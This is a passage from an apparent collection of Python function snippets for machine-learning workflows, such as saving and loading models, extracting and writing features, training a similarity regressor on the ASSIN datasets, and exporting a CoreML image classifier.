words_vec, features = countize(row[3], row[2], words_vec, features)\n try:\n words_vec, features = countize(row[6], row[2], words_vec, features)\n except:\n pass\n pickle.dump(words_vec, open(\"ind_vectors.data\", \"wb\"))\n pickle.dump(features, open(\"i_features.data\", \"wb\"))\n return words_vec, features", "def save(self, model_out_file):\n\t\tvariables_dict = {v.name: v for v in tf.global_variables()}\n\t\tvalues_dict = self.sess.run(variables_dict)\n\t\tnp.savez(open(model_out_file, 'wb'), **values_dict)", "def save_features_to_file(self):\n if not os.path.exists(self.features_save_path):\n os.makedirs(self.features_save_path)\n for s in self.sets:\n self.save_features_to_file_by_set(s)", "def write_model_data(model, filename):\n data = lasagne.layers.get_all_param_values(model)\n filename = os.path.join('./', filename)\n filename = '%s.%s' % (filename, 'params')\n with open(filename, 'w+') as f:\n pickle.dump(data, f)", "def save_data(features, labels, mask, file_name):\n label = labels[mask]\n label = label.reshape((len(label), 1))\n data = np.concatenate((features[mask, :], label), axis = 1)\n np.save(file_name, data)", "def save_feature(ndarray, feature_name, out_path, x, y, new_labels, filename=None):\n # this is kind-of standard\n filename = filename or FeatureExtractor.get_file_name(x, feature_name)\n np.save(out_path / filename, ndarray)\n new_labels.append([filename, y])\n print('info: {} transformed and saved!'.format(filename))\n return filename", "def run_model(model_name, clf, X_train, y_train, X_test, y_test, feat, output_dirpath):\n model = clf.fit(X_train, y_train)\n score = model.score(X_test, y_test)\n train_pred = model.predict(X_train)\n model_pred = model.predict(X_test)\n\n # Save predictions\n dirpath = os.path.join(output_dirpath, '{}_{}'.format(model_name, feat), 'predictions')\n if not os.path.exists(dirpath):\n os.makedirs(dirpath)\n np.savetxt(os.path.join(dirpath, f'{model_name.replace(\"/\", \"_\").replace(\" \", \"_\")}_test_preds.txt'), model_pred)\n np.savetxt(os.path.join(dirpath, f'{model_name.replace(\"/\", \"_\").replace(\" \", \"_\")}_train_preds.txt'), train_pred)\n\n # Save classifier (with weights)\n dirpath = os.path.join(output_dirpath, '{}_{}'.format(model_name, feat), 'models')\n if not os.path.exists(dirpath):\n os.makedirs(dirpath)\n with open(os.path.join(dirpath, f'{model_name.replace(\"/\", \"_\").replace(\" \", \"_\")}.pkl'), 'wb') as f:\n pickle.dump(model, f)\n\n return model, score, model_pred", "def load_vectors (file_extension = None):\n \n feat_file_name = 'output/' + file_extension + '.feature'\n label_file_name = 'output/' + file_extension + '.label'\n \n prettyPrint( \"Loading feature vectors and labels from disk ... \", color.CYAN)\n if not os.path.isfile(feat_file_name) or not os.path.isfile(label_file_name):\n prettyPrint(\"Feature vector files {0} could not be found. Generating from scratch instead ...\".format(feat_file_name), color.CYAN)\n return None, None\n with open(feat_file_name, 'r') as f:\n feat_vec = pickle.load(f)\n with open(label_file_name, 'r') as f:\n labels = pickle.load(f)\n\n prettyPrint (\"Done loading feature vectors.\", color.CYAN)\n return feat_vec, labels", "def run_feature_extraction(word2vec_model=None, fasttext_model=None, ptlkb64_model=None, glove300_model=None, numberbatch_model=None):\n\n\tparser = argparse.ArgumentParser(description=__doc__)\n\tparser.add_argument('test', help='XML file with test data')\n\tparser.add_argument('output', help='Output tagged XML file')\n\targs = parser.parse_args()\n\n\t\"\"\"\n\tsystem_mode = 0 -> uses the variant questions with the system\n\tsystem_mode = 1 -> uses the PTPT and PTBR train ASSIN collection datasets with the system\n\tsystem_mode = 2 -> uses the PTPT and PTBR train and test ASSIN collection datasets with the system\n\tsystem_mode = 3 -> uses the Whoosh collection with the system\n\tsystem_mode = 4 -> uses ASSIN 1 and ASSIN 2 training collection datasets with the system\n\tsystem_mode = 5 -> uses ASSIN 1 training and testing collection and ASSIN 2 training collection datasets with the system\n\n\trun_pipeline = 0 -> uses the pre-computed files with the components needed to extract some features\n\trun_pipeline = 1 -> uses NLPyPort pipeline which avoids having to pre-compute certain components to extract features\n\t\"\"\"\n\n\tsystem_mode = 5\n\trun_pipeline = 1\n\n\t# Flag to indicate if the extracted features should be written to a file (1) or not (0)\n\tfeatures_to_file_flag = 0\n\n\t# extract labels\n\ttrain_pairs = []\n\ttrain_pairs.extend(read_xml(ROOT_PATH + \"/datasets/assin/assin1/assin-ptpt-train.xml\", need_labels=True))\n\ttrain_pairs.extend(read_xml(ROOT_PATH + \"/datasets/assin/assin1/assin-ptbr-train.xml\", need_labels=True))\n\n\tif system_mode == 2 or system_mode == 5:\n\t\ttrain_pairs.extend(read_xml(ROOT_PATH + \"/datasets/assin/assin1/assin-ptpt-test.xml\", need_labels=True))\n\t\ttrain_pairs.extend(read_xml(ROOT_PATH + \"/datasets/assin/assin1/assin-ptbr-test.xml\", need_labels=True))\n\tif system_mode == 4 or system_mode == 5:\n\t\ttrain_pairs.extend(read_xml(ROOT_PATH + \"/datasets/assin/assin2/assin2-train-only.xml\", need_labels=True))\n\n\ttrain_similarity_target = np.array([pair.similarity for pair in train_pairs])\n\n\t# extract training features\n\ttrain_corpus = read_corpus(train_pairs)\n\n\t# debug_data(train_corpus, \"finetune.train.raw\")\n\t# print(\"Wrote training corpus\")\n\n\t# preprocessing(text, tokenization=0, rm_stopwords=0, numbers_to_text=0, to_tfidf=0)\n\tpreprocessed_train_corpus = preprocessing(train_corpus, 0, 0, 0, 0)\n\ttrain_features, used_train_features = extract_features(run_pipeline, train_corpus, preprocessed_train_corpus, word2vec_mdl=word2vec_model, fasttext_mdl=fasttext_model, ptlkb64_mdl=ptlkb64_model, glove300_mdl=glove300_model, numberbatch_mdl=numberbatch_model)\n\n\t# write train features to a .csv file\n\tif features_to_file_flag == 1:\n\t\twrite_features_to_csv(train_pairs, train_features, \"assin1-train-test-assin2-train-ftrain.csv\")\n\n\t#############################################################\n\ttest_pairs_dev = read_xml('datasets/assin/assin2/assin2-dev.xml', need_labels=False)\n\n\ttest_corpus_dev = read_corpus(test_pairs_dev)\n\t# preprocessing(text, tokenization=0, rm_stopwords=0, numbers_to_text=0, to_tfidf=0)\n\tpreprocessed_test_corpus_dev = preprocessing(test_corpus_dev, 0, 0, 0, 0)\n\ttest_features_dev, used_test_features_dev = extract_features(run_pipeline, test_corpus_dev, preprocessed_test_corpus_dev, word2vec_mdl=word2vec_model, fasttext_mdl=fasttext_model, ptlkb64_mdl=ptlkb64_model, glove300_mdl=glove300_model, numberbatch_mdl=numberbatch_model)\n\n\ttest_pairs_selection = read_xml('datasets/assin/assin2/assin2-dev.xml', need_labels=True)\n\ttest_similarity_target = np.array([pair.similarity for pair in test_pairs_selection])\n\t#############################################################\n\n\t# extract test features\n\t# test_pairs = read_xml(args.test, need_labels=False)\n\n\t# uncomment next line and comment previous one to compute ASSIN 2 submission results\n\ttest_pairs = read_xml_no_attributes(args.test)\n\n\ttest_corpus = read_corpus(test_pairs)\n\t# preprocessing(text, tokenization=0, rm_stopwords=0, numbers_to_text=0, to_tfidf=0)\n\tpreprocessed_test_corpus = preprocessing(test_corpus, 0, 0, 0, 0)\n\ttest_features, used_test_features = extract_features(run_pipeline, test_corpus, preprocessed_test_corpus, word2vec_mdl=word2vec_model, fasttext_mdl=fasttext_model, ptlkb64_mdl=ptlkb64_model, glove300_mdl=glove300_model, numberbatch_mdl=numberbatch_model)\n\n\t# write test features to a .csv file\n\tif features_to_file_flag == 1:\n\t\twrite_features_to_csv(test_pairs, test_features, \"assin1-train-test-assin2-train-ftest.csv\")\n\n\t# extract test features for feature selection (labels needed in order to perform evaluation)\n\t# test_pairs_selection = read_xml(args.test, need_labels=True)\n\t# test_similarity_target = np.array([pair.similarity for pair in test_pairs_selection])\n\n\t'''\n\tSelect one type of regressor from scikit-learn. Here is a list with some examples: \n\t\t- GaussianProcessRegressor()\n\t\t- DecisionTreeRegressor()\n\t\t- LinearRegression()\n\t\t- BaggingRegressor(n_estimators=100)\n\t\t- AdaBoostRegressor(n_estimators=100)\n\t\t- GradientBoostingRegressor()\n\t\t- RandomForestRegressor(n_estimators=100)\n\t'''\n\n\tregressor = SVR(gamma='scale', C=10.0, kernel='rbf')\n\n\t# ensemble = VotingRegressor(estimators=[('svr', regressor_1), ('gb', regressor_2), ('rf', regressor_3)])\n\n\t# params = {'svr__C': [1.0, 10.0, 100.0], 'svr__kernel': ['linear', 'poly', 'rbf', 'sigmoid'], 'rf__n_estimators': [10, 20, 100, 200]}\n\n\t# params = {'kernel':('linear', 'poly', 'rbf', 'sigmoid')}\n\n\t# regressor = GridSearchCV(regressor_1, params, cv=5)\n\n\tuse_feature_selection = 0\n\n\tif use_feature_selection:\n\t\t# selected_selector, selected_train_features, selected_test_features = feature_selection(train_features, test_features_dev, train_similarity_target, test_similarity_target, regressor, used_train_features)\n\t\t# selected_train_features, selected_test_features = rfe_cross_validation(train_features, train_similarity_target, test_features)\n\t\tselected_train_features, selected_test_features, percentile_selector = aux_best_percentile_selector(train_features, test_features_dev, train_similarity_target, test_similarity_target, regressor, used_train_features)\n\n\t\ttest_features_selected = percentile_selector.transform(test_features)\n\t\t# test_features_selected = selected_selector.transform(test_features)\n\n\t\tregressor.fit(selected_train_features, train_similarity_target)\n\n\t\t# save model to disk\n\t\tmodel_save_path = os.path.join('trained_models', 'SVR_FS.joblib')\n\t\tdump(regressor, model_save_path)\n\n\t\t# apply model to the test dataset\n\t\t## this needs to be fixed in order to take advantage of the manual feature selection\n\t\tpredicted_similarity = regressor.predict(test_features_selected)\n\t\t# predicted_similarity = regressor.predict(test_features_selected)\n\telse:\n\t\tregressor.fit(train_features, train_similarity_target)\n\n\t\t# save model to disk\n\t\tmodel_save_path = os.path.join('trained_models', 'SVR_NFS.joblib')\n\t\tdump(regressor, model_save_path)\n\n\t\t# apply model to the test dataset\n\t\tpredicted_similarity = regressor.predict(test_features)\n\n\t# write output\n\ttree = ET.parse(args.test)\n\troot = tree.getroot()\n\tfor i in range(len(test_pairs)):\n\t\tpairs = root[i]\n\t\tpairs.set('entailment', \"None\")\n\t\tpairs.set('similarity', str(predicted_similarity[i]))\n\n\ttree.write(args.output, 'utf-8')", "def extract_features_for_file(input_file, output_file, posfile):\n if not unlabeled:\n sents = read_file(input_file)\n else:\n sents = read_file_unlabeled(input_file)\n postags = get_pos_tags(posfile)\n with open(output_file,'w') as output_fileobj:\n if not unlabeled:\n for tokens,goldtags in sents:\n feats = extract_features_for_sentence(tokens, postags)\n for t in range(len(tokens)):\n feats_tabsep = \"\\t\".join(feats[t])\n print>>output_fileobj, \"%s\\t%s\" % (goldtags[t], feats_tabsep)\n print>>output_fileobj, \"\"\n else:\n for tokens in sents:\n feats = extract_features_for_sentence(tokens, postags)\n for t in range(len(tokens)):\n feats_tabsep = \"\\t\".join(feats[t])\n print>>output_fileobj, \"%s\" % (feats_tabsep) #for nolabels dat\n print>>output_fileobj, \"\"", "def feature_extraction(images, save_to='dataset.csv'):\n num_images = len(images)\n logging.info(f\"Extracting features from {num_images} images...\")\n x = np.zeros((num_images, 7))\n y = np.zeros(num_images, dtype=np.int8)\n\n for i, image in enumerate(images):\n logging.info(f\"Processing Image {i+1}/{num_images}...\")\n y[i] = 0 if image.name.startswith('cyl') \\\n else 1 if image.name.startswith('inter') \\\n else 2 if image.name.startswith('let') \\\n else 3 if image.name.startswith('mod') \\\n else 4 if image.name.startswith('para') \\\n else 5 if image.name.startswith('super') \\\n else 6 if image.name.startswith('svar') else -1\n \n # Get number of object pixels in segmented color channels, which become features 0-3\n for color in [0,1,2,4]: # 3 is the color index for RGB so we skip that and use 4 (grayscale)\n uniques, counts = np.unique(image.getMatrix(color), return_counts=True)\n if len(uniques) > 2:\n image = image.otsu(color)\n uniques, counts = np.unique(image.getMatrix(color), return_counts=True)\n x[i,color if color is not 4 else 3] = counts[0]\n\n x[i,4] = np.std(image.getHistogram(4))\n\n x[i,5] = np.argmax(image.getHistogram(4))\n\n x[i,6] = np.argmin(image.getHistogram(4))\n\n # Save new dataset to file\n np.savetxt(save_to, np.concatenate([x,np.atleast_2d(y).T], axis=1), delimiter=',', fmt='%s')\n\n return x, y", "def feature_finder(model):\n \n features = model.steps[0][1].get_feature_names()\n feat_values = model[1].coef_\n\n c = {'features' : features}\n feats = pd.DataFrame(data = c)\n feats['values'] = feat_values[0]\n\n sorted_feats = feats.sort_values(by='values')\n return sorted_feats", "def write_pred_kaggle_file(cls, outfname, speech):\n yp = cls.predict(speech.test_doc_vec)\n labels = speech.le.inverse_transform(yp)\n f = codecs.open(outfname, 'w')\n f.write(\"FileIndex,Category\\n\")\n for i in range(len(speech.test_fnames)):\n fname = speech.test_fnames[i]\n f.write(fname + ',' + labels[i] + '\\n')\n f.close()", "def extract(model, filepath, vid):\n # data loader for frames in ingle video\n data_loader = get_dataloader(dataset=\"VideoFrame\",\n path=filepath,\n num_frames=cfg.num_frames,\n batch_size=cfg.batch_size)\n # extract features by inception_v3\n feats = None\n for step, frames in enumerate(data_loader):\n print(\"--> extract features [{}/{}]\".format(step + 1,\n len(data_loader)))\n feat = model(make_variable(frames))\n feats = concat_feat_var(feats, feat.data.cpu())\n\n print(\"--> save feats to {}\"\n .format(cfg.inception_v3_feats_path.format(vid)))\n torch.save(feats, cfg.inception_v3_feats_path.format(vid))\n print(\"--> delete original video file: {}\".format(filepath))\n os.remove(filepath)", "def store_sorted_features(self) -> None:\n\n makedirs(dirname(self.model_weights_path_template_), exist_ok=True)\n\n # Generate feature weights files and a README.json providing\n # the parameters corresponding to each set of feature weights\n params_dict = {}\n for learner_name in self.cv_learners_:\n\n # Skip MiniBatchKMeans models\n if learner_name == 'MiniBatchKMeans':\n logdebug('Skipping MiniBatchKMeans learner instances since '\n 'coefficients can not be extracted from them.')\n continue\n\n for i, estimator in enumerate(self.cv_learners_[learner_name]):\n\n # Get dataframe of the features/coefficients\n try:\n ex.print_model_weights(estimator,\n learner_name,\n self.data_.classes,\n self.cfg_.games,\n self.vec_,\n self.model_weights_path_template_\n .format(learner_name, i + 1))\n params_dict.setdefault(learner_name, {})\n params_dict[learner_name][i] = estimator.get_params()\n except ValueError:\n logerr('Could not generate features/feature coefficients '\n 'dataframe for {0}...'.format(learner_name))\n\n # Save parameters file also\n if params_dict:\n dump(params_dict,\n open(join(dirname(self.model_weights_path_template_),\n 'model_params_readme.json'), 'w'),\n indent=4)", "def walk_forward_prediction(self):\r\n for output_name in self.output_names:\r\n print('\\t\\t\\t|--Prediction type: {}'.format(output_name))\r\n predictions_by_model = {}\r\n pred_metadata_by_model = {}\r\n \r\n print('\\t\\t\\t\\t|--SVM Model')\r\n svm = SupportVectorMachine()\r\n svm.pred_indices = self.pred_indices\r\n svm.full_df = self.full_df\r\n svm.feature_names = self.feature_names\r\n svm.output_name = output_name\r\n svm.svm_optimal_params = self.optimal_params_by_output[output_name]['SVM']\r\n svm.run_svm_prediction()\r\n predictions_by_model['SVM'] = svm.svm_predictions\r\n pred_metadata_by_model['SVM'] = svm.metadata\r\n \r\n self.predictions_by_output[output_name] = predictions_by_model\r\n self.pred_metadata_by_output[output_name] = pred_metadata_by_model", "def saveModel(self):\n for feature in self.features:\n featureName = feature[\"name\"]\n modelProbs = self.model[featureName][\"probabilities\"]\n modelFreqs = self.model[featureName][\"frequencies\"]\n repository.saveProbabilites(modelProbs, self.modelName, featureName, self.modelClass)\n repository.saveFrequences(modelFreqs, self.modelName, featureName, self.modelClass)", "def build_features_and_save_dataset(read_directory, data_save_directory, data_model_save_directory):\n dataset.build_dataset_and_datamodel(\n read_directory=read_directory,\n data_save_directory=data_save_directory,\n data_model_save_directory=data_model_save_directory,\n vectorizer_params=dataset.DEFAULT_VECTORIZER_SETTINGS\n )\n print('Successfully built and saved dataset and data model.')", "def WriteCcmModelToFile(filename, model):\n #Write the .hpp file\n WriteHeaderFileForCcmModel(filename, model)\n\n #Write the .cpp fil\n WriteSourceFileForCcmModel(filename, model)", "def saveModel(model, outfile, train_opts, model_opts, view_names=None, sample_names=None, feature_names=None):\n\n # QC checks\n assert model.trained == True, \"Model is not trained yet\"\n assert len(np.unique(view_names)) == len(view_names), 'View names must be unique'\n assert len(np.unique(sample_names)) == len(sample_names), 'Sample names must be unique'\n\n # Create output directory\n if not os.path.isdir(os.path.dirname(outfile)):\n print(\"Output directory does not exist, creating it...\")\n os.makedirs(os.path.dirname(outfile))\n\n # For some reason h5py orders the datasets alphabetically, so we have to sort the likelihoods accordingly\n idx = sorted(range(len(view_names)), key=lambda k: view_names[k])\n tmp = [model_opts[\"likelihood\"][idx[m]] for m in range(len(model_opts[\"likelihood\"]))]\n model_opts[\"likelihood\"] = tmp\n\n # Open HDF5 handler\n hdf5 = h5py.File(outfile,'w')\n\n # Save expectations\n saveExpectations(model,hdf5,view_names)\n\n # Save parameters\n # saveParameters(model,hdf5,view_names)\n\n # Save training statistics\n saveTrainingStats(model,hdf5)\n\n # Save training options\n saveTrainingOpts(train_opts,hdf5)\n\n # Save model options\n saveModelOpts(model_opts,hdf5)\n\n # Save training data\n saveTrainingData(model, hdf5, view_names, sample_names, feature_names, model_opts[\"likelihood\"])\n\n # Close HDF5 file\n hdf5.close()", "def saveTrainingData(model, hdf5, view_names=None, sample_names=None, feature_names=None, likelihoods=None):\n data = model.getTrainingData()\n data_grp = hdf5.create_group(\"data\")\n featuredata_grp = hdf5.create_group(\"features\")\n hdf5.create_dataset(\"samples\", data=np.array(sample_names, dtype='S50'))\n\n if likelihoods is not None:\n data_grp.attrs['likelihood'] = np.array(likelihoods, dtype='S50')\n\n for m in range(len(data)):\n view = view_names[m] if view_names is not None else str(m)\n data_grp.create_dataset(view, data=data[m].data.T)\n if feature_names is not None:\n # data_grp.attrs['features'] = np.array(feature_names[m], dtype='S')\n featuredata_grp.create_dataset(view, data=np.array(feature_names[m], dtype='S50'))", "def write_out_prediction_objects(model, lookups):\n neighbours = get_neighbours(lookups, model)\n id_to_movie = get_reverse_movie_lookup(lookups)\n popular_films = get_popular(lookups)\n\n output = {\n \"neighbours\": neighbours,\n \"id_to_movie\": id_to_movie,\n \"popular_films\": popular_films,\n }\n\n with open(PICKLE_FILENAME, \"wb\") as f:\n pickle.dump(output, f)\n\n return output", "def predict(model_path: str, vec_path: str, data_dir_path: str, numeric: bool):\n logistic = pickle.load(open(model_path, 'rb'))\n vec = pickle.load(open(vec_path, 'rb'))\n # Negative/Normal pcaps.\n # They have no relationship with \"context\" defined in AppInspector, just a bunch of normal flows.\n test_flows = []\n for root, dirs, files in os.walk(data_dir_path):\n for file in files:\n if file.endswith('_http_flows.json'):\n with open(os.path.join(root, file), 'r', encoding=\"utf8\", errors='ignore') as infile:\n flows = json.load(infile)\n for flow in flows:\n # The context label is as same as the ground truth since they are not labelled by AppInspector.\n flow['real_label'] = '0'\n test_flows.append(flow)\n logger.info('The number of test flows %d', len(test_flows))\n # Covert the flows to a feature matrix.\n text_fea, numeric_fea, y, true_labels = Analyzer.gen_instances([], test_flows)\n X, feature_names, vec = Learner.LabelledDocs.vectorize(text_fea, vec=vec, tf=False)\n if numeric:\n X = X.toarray()\n X = np.hstack([X, numeric_fea])\n # Prediction.\n res = logistic.predict(X)\n # Analysis.\n analyze(logistic, res, X, test_flows, feature_names)", "def get_feature_labels_files(dataset):\n features = []\n audio_labels = []\n focal_labels = []\n files = []\n for frame in dataset:\n files.append(frame[0])\n features.append(frame[1][0].T)\n if frame[1][1] is not None:\n audio_labels.append(frame[1][1][0].T)\n focal_labels.append(frame[1][1][1].T)\n else:\n audio_labels.append(None)\n focal_labels.append(None)\n features = np.expand_dims(np.asarray(features), 4)\n audio_labels = np.asarray(audio_labels)\n focal_labels = np.asarray(focal_labels)\n return [features, audio_labels,focal_labels, files]", "def get_feature_vector(cc, img, quiet=False):\n savefilename = config.get_classifier_featvect_name(cc.d.images[img]) \n if os.path.isfile(savefilename):\n print 'load feat_vect %s'%(cc.d.images[img].name)\n feat_vect = cPickle.load(open(savefilename,'r'))\n else:\n feat_vect = compute_feature_vector(cc, img, quiet=quiet)\n cPickle.dump(feat_vect, open(savefilename,'w'))\n return feat_vect", "def save_model(model, model_filepath):\n # save the classifier\n with open(model_filepath, 'wb') as fid:\n pkl.dump(model, fid)", "def save_model(self):\n print(\"\\nModels are integrated to be multi scale.\\nSaving to disk.\")\n self.column_names = [ \"x_\" + str(x) for x in range(self.embedding.shape[1])]\n self.embedding = pd.DataFrame(self.embedding, columns = self.column_names)\n self.embedding.to_csv(self.args.output, index = None)", "def export(self, output_dir, config, train_ratio=0.7, delimiter=\",\"):\n model_dir = os.path.join(output_dir, self.model_id)\n if not os.path.exists(model_dir):\n os.makedirs(model_dir)\n X_tr, X_te = self.get_train_test_embeddings(config, train_ratio)\n #save text feature matrix\n idx = config[\"dimension\"]\n tr_text = csr_matrix(X_tr[:,:idx])\n te_text = csr_matrix(X_te[:,:idx])\n print(\"text\", tr_text.shape, te_text.shape)\n save_npz(os.path.join(model_dir, \"train_text\"), tr_text)\n save_npz(os.path.join(model_dir, \"test_text\"), te_text)\n #save history feature matrix\n if config.get(\"user_history\", False):\n tr_history = X_tr[:,idx:idx+4]\n te_history = X_te[:,idx:idx+4]\n np.savetxt(os.path.join(model_dir, \"train_history.csv\"), tr_history, delimiter=delimiter)\n np.savetxt(os.path.join(model_dir, \"test_history.csv\"), te_history, delimiter=delimiter)\n idx += 4\n print(\"history\", tr_history.shape, te_history.shape)\n # save node embeddings\n if \"user_ne\" in config and X_tr.shape[1] > idx:\n tr_network = X_tr[:,idx:]\n te_network = X_te[:,idx:]\n np.savetxt(os.path.join(model_dir, \"train_network.csv\"), tr_network, delimiter=delimiter)\n np.savetxt(os.path.join(model_dir, \"test_network.csv\"), te_network, delimiter=delimiter)\n print(\"network\", tr_network.shape, te_network.shape)\n #save labels\n np.savetxt(os.path.join(model_dir, \"train_label.csv\"), self.tr_label, delimiter=delimiter, fmt='%i')\n np.savetxt(os.path.join(model_dir, \"test_label.csv\"), self.te_label, delimiter=delimiter, fmt='%i')\n #save meta\n self.tr_meta[self._exported_meta_columns].to_csv(os.path.join(model_dir, \"train_meta.csv\"), index=False, sep=delimiter)\n self.te_meta[self._exported_meta_columns].to_csv(os.path.join(model_dir, \"test_meta.csv\"), index=False, sep=delimiter)\n print(\"Model was exported\")\n return model_dir", "def _collect_features(self, save=None):\n makedir(self.modeldir)\n if save is None:\n save = '{:s}/all.fts'.format(self.modeldir)\n \n feats = []\n fls = glob('{:s}/*.fts'.format(self.modeldir))\n for i,fl in enumerate(fls):\n if fl.split(os.sep)[-1].split('.')[0] in ['all','ranked']: continue\n with open(fl) as fp:\n lns = fp.readlines()\n feats += [' '.join(ln.rstrip().split()[1:]) for ln in lns] \n\n labels = list(set(feats))\n freqs = [feats.count(label) for label in labels]\n labels = [label for _,label in sorted(zip(freqs,labels))][::-1]\n freqs = sorted(freqs)[::-1]\n # write out feature frequencies\n with open(save, 'w') as fp:\n _ = [fp.write('{:d},{:s}\\n'.format(freq,ft)) for freq,ft in zip(freqs,labels)]\n return labels, freqs", "def export_coreml(self, filename):\n import coremltools\n # First define three internal helper functions\n\n\n # Internal helper function\n def _create_vision_feature_print_screen():\n prob_name = self.target + 'Probability'\n\n #\n # Setup the top level (pipeline classifier) spec\n #\n top_spec = coremltools.proto.Model_pb2.Model()\n top_spec.specificationVersion = 3\n\n desc = top_spec.description\n desc.output.add().name = prob_name\n desc.output.add().name = self.target\n\n desc.predictedFeatureName = self.target\n desc.predictedProbabilitiesName = prob_name\n\n input = desc.input.add()\n input.name = self.feature\n input.type.imageType.width = 299\n input.type.imageType.height = 299\n BGR_VALUE = coremltools.proto.FeatureTypes_pb2.ImageFeatureType.ColorSpace.Value('BGR')\n input.type.imageType.colorSpace = BGR_VALUE\n\n #\n # VisionFeaturePrint extractor\n #\n pipelineClassifier = top_spec.pipelineClassifier\n scene_print = pipelineClassifier.pipeline.models.add()\n scene_print.specificationVersion = 3\n scene_print.visionFeaturePrint.scene.version = 1\n\n input = scene_print.description.input.add()\n input.name = self.feature\n input.type.imageType.width = 299\n input.type.imageType.height = 299\n input.type.imageType.colorSpace = BGR_VALUE\n\n output = scene_print.description.output.add()\n output.name = \"output_name\"\n DOUBLE_ARRAY_VALUE = coremltools.proto.FeatureTypes_pb2.ArrayFeatureType.ArrayDataType.Value('DOUBLE')\n output.type.multiArrayType.dataType = DOUBLE_ARRAY_VALUE\n output.type.multiArrayType.shape.append(2048)\n\n #\n # Neural Network Classifier, which is just logistic regression, in order to use GPUs\n #\n temp = top_spec.pipelineClassifier.pipeline.models.add()\n temp.specificationVersion = 3\n\n # Empty inner product layer\n nn_spec = temp.neuralNetworkClassifier\n feature_layer = nn_spec.layers.add()\n feature_layer.name = \"feature_layer\"\n feature_layer.input.append(\"output_name\")\n feature_layer.output.append(\"softmax_input\")\n fc_layer_params = feature_layer.innerProduct\n fc_layer_params.inputChannels = 2048\n\n # Softmax layer\n softmax = nn_spec.layers.add()\n softmax.name = \"softmax\"\n softmax.softmax.MergeFromString(b'')\n softmax.input.append(\"softmax_input\")\n softmax.output.append(prob_name)\n\n input = temp.description.input.add()\n input.name = \"output_name\"\n input.type.multiArrayType.dataType = DOUBLE_ARRAY_VALUE\n input.type.multiArrayType.shape.append(2048)\n\n # Set outputs\n desc = temp.description\n prob_output = desc.output.add()\n prob_output.name = prob_name\n label_output = desc.output.add()\n label_output.name = self.target\n\n if type(self.classifier.classes[0]) == int:\n prob_output.type.dictionaryType.int64KeyType.MergeFromString(b'')\n label_output.type.int64Type.MergeFromString(b'')\n else:\n prob_output.type.dictionaryType.stringKeyType.MergeFromString(b'')\n label_output.type.stringType.MergeFromString(b'')\n\n temp.description.predictedFeatureName = self.target\n temp.description.predictedProbabilitiesName = prob_name\n\n return top_spec\n\n\n # Internal helper function\n def _update_last_two_layers(nn_spec):\n # Replace the softmax layer with new coeffients\n num_classes = self.num_classes\n fc_layer = nn_spec.layers[-2]\n fc_layer_params = fc_layer.innerProduct\n fc_layer_params.outputChannels = self.classifier.num_classes\n inputChannels = fc_layer_params.inputChannels\n fc_layer_params.hasBias = True\n\n coefs = self.classifier.coefficients\n weights = fc_layer_params.weights\n bias = fc_layer_params.bias\n del weights.floatValue[:]\n del bias.floatValue[:]\n\n import numpy as np\n W = np.array(coefs[coefs['index'] != None]['value'], ndmin = 2).reshape(\n inputChannels, num_classes - 1, order = 'F')\n b = coefs[coefs['index'] == None]['value']\n Wa = np.hstack((np.zeros((inputChannels, 1)), W))\n weights.floatValue.extend(Wa.flatten(order = 'F'))\n bias.floatValue.extend([0.0] + list(b))\n\n # Internal helper function\n def _set_inputs_outputs_and_metadata(spec, nn_spec):\n # Replace the classifier with the new classes\n class_labels = self.classifier.classes\n\n probOutput = spec.description.output[0]\n classLabel = spec.description.output[1]\n probOutput.type.dictionaryType.MergeFromString(b'')\n if type(class_labels[0]) == int:\n nn_spec.ClearField('int64ClassLabels')\n probOutput.type.dictionaryType.int64KeyType.MergeFromString(b'')\n classLabel.type.int64Type.MergeFromString(b'')\n del nn_spec.int64ClassLabels.vector[:]\n for c in class_labels:\n nn_spec.int64ClassLabels.vector.append(c)\n else:\n nn_spec.ClearField('stringClassLabels')\n probOutput.type.dictionaryType.stringKeyType.MergeFromString(b'')\n classLabel.type.stringType.MergeFromString(b'')\n del nn_spec.stringClassLabels.vector[:]\n for c in class_labels:\n nn_spec.stringClassLabels.vector.append(c)\n\n prob_name = self.target + 'Probability'\n label_name = self.target\n old_output_name = nn_spec.layers[-1].name\n coremltools.models.utils.rename_feature(spec, 'classLabel', label_name)\n coremltools.models.utils.rename_feature(spec, old_output_name, prob_name)\n if nn_spec.layers[-1].name == old_output_name:\n nn_spec.layers[-1].name = prob_name\n if nn_spec.labelProbabilityLayerName == old_output_name:\n nn_spec.labelProbabilityLayerName = prob_name\n coremltools.models.utils.rename_feature(spec, 'data', self.feature)\n if len(nn_spec.preprocessing) > 0:\n nn_spec.preprocessing[0].featureName = self.feature\n\n mlmodel = coremltools.models.MLModel(spec)\n model_type = 'image classifier (%s)' % self.model\n mlmodel.short_description = _coreml_utils._mlmodel_short_description(model_type)\n mlmodel.input_description[self.feature] = u'Input image'\n mlmodel.output_description[prob_name] = 'Prediction probabilities'\n mlmodel.output_description[label_name] = 'Class label of top prediction'\n _coreml_utils._set_model_metadata(mlmodel, self.__class__.__name__, {\n 'model': self.model,\n 'target': self.target,\n 'features': self.feature,\n 'max_iterations': str(self.max_iterations),\n }, version=ImageClassifier._PYTHON_IMAGE_CLASSIFIER_VERSION)\n\n return mlmodel\n\n\n # main part of the export_coreml function\n if self.model in _pre_trained_models.MODELS:\n ptModel = _pre_trained_models.MODELS[self.model]()\n feature_extractor = _image_feature_extractor.MXFeatureExtractor(ptModel)\n\n coreml_model = feature_extractor.get_coreml_model()\n spec = coreml_model.get_spec()\n nn_spec = spec.neuralNetworkClassifier\n else: # model == VisionFeaturePrint_Screen\n spec = _create_vision_feature_print_screen()\n nn_spec = spec.pipelineClassifier.pipeline.models[1].neuralNetworkClassifier\n\n _update_last_two_layers(nn_spec)\n mlmodel = _set_inputs_outputs_and_metadata(spec, nn_spec)\n mlmodel.save(filename)", "def save_model(self):\n\n print('Save model')\n self.feature_extractor.save_weights(\n self.path_save_model + self.name_model + '.h5')\n\n print('Mean and std')\n np.save(self.path_save_model + 'mean.npy', self.mean)\n np.save(self.path_save_model + 'std.npy', self.std)", "def decode(dataset, model, idx2token, save_file, align=False, log=False):\n with open(save_file, 'w') as fw:\n for sample in tqdm(dataset):\n uttid = sample['uttid']\n x = np.array([sample['feature']], dtype=np.float32)\n logits = model(x)\n _align = get_predicts(logits)[0].numpy()\n list_tokens = []\n token_prev = None\n for token in _align:\n if token_prev == token:\n continue\n list_tokens.append(token)\n token_prev = token\n if align:\n line = ' '.join(str(token) for token in _align)\n else:\n line = ' '.join(idx2token[token] for token in list_tokens)\n if log:\n print('predicted align: ', _align)\n print('predicted trans: ', line)\n fw.write(uttid + 